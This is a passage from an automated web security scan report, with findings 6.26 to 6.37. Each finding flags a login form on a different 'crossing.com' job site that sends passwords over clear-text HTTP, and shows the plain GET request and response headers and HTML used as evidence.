Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:21 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:21 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:21 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 121001

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.computeraideddesigncrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.26. http://www.constructioncrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.constructioncrossing.com
Path:   /

Issue detail

The page contains a form with the action URL http://www.constructioncrossing.com/index.php, which is submitted over clear-text HTTP. The form contains the password field clslogin_password.

Request

GET / HTTP/1.1
Host: www.constructioncrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:22 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=6c5ho2kr4aaj7if0r37e83a520; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:22 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 131637

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.constructioncrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.27. http://www.consultingcrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.consultingcrossing.com
Path:   /

Issue detail

The page contains a form with the action URL http://www.consultingcrossing.com/index.php, which is submitted over clear-text HTTP. The form contains the password field clslogin_password.

Request

GET / HTTP/1.1
Host: www.consultingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:22 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=cd981ht9vh5kim10q4v8a0ih67; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:22 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 111912

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.consultingcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.28. http://www.contractmanagementcrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.contractmanagementcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.contractmanagementcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:33 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=fsi5mhj5680mc16iu88s1m9v73; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:33 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:33 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:33 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:33 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:33 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:33 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:33 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:33 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 111832

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.contractmanagementcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.29. http://www.counselingcrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.counselingcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.counselingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:46 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=lgk9crdg1goruniholj5urn963; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:46 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:46 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:46 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:46 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:46 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:46 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:46 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:46 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 149300

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.counselingcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.30. http://www.cpluspluscrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cpluspluscrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.cpluspluscrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:52 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=j0ddtd9qvkbq5g8p17jjmqsi44; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:52 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:52 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:52 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:52 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:52 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:52 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:52 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:52 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 114789

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.cpluspluscrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.31. http://www.customerservicecrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.customerservicecrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.customerservicecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:04 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=e126ahin8nno4266rg114hr8q7; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:05 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:05 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:05 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:05 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:05 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:05 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:05 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:05 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 119384

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.customerservicecrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.32. http://www.dbacrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dbacrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.dbacrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:08 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ks0hq7i64reib4jv7s3j12ces0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:08 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 125721

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.dbacrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.33. http://www.dentalcrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dentalcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.dentalcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:08 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=od1eunkj1a6cadocmt8bfbgt55; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:08 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 111827

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.dentalcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.34. http://www.designingcrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.designingcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.designingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:17 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=3h4obslpuiqaf86r78fndl2ip2; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:17 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:17 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:17 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:17 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:17 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:17 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:17 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:17 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 122676

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.designingcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.35. http://www.diversitycrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.diversitycrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.diversitycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:25 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=oh70k7g7bb01l9sdpsaq85rgq4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:25 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:25 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:25 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:25 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:25 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:25 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:25 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:25 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 135908

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.diversitycrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.36. http://www.dotnetcrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dotnetcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.dotnetcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:28 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=r5bbu9cr0v14lapurelqu9r7t1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:28 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:28 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:28 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:28 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:28 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:28 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:28 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:28 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 111450

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.dotnetcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.37. http://www.ecommercecrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ecommercecrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.ecommercecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:39 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=jkaapevh1eqi41fjlqg0qqj0f4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:39 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:39 GMT
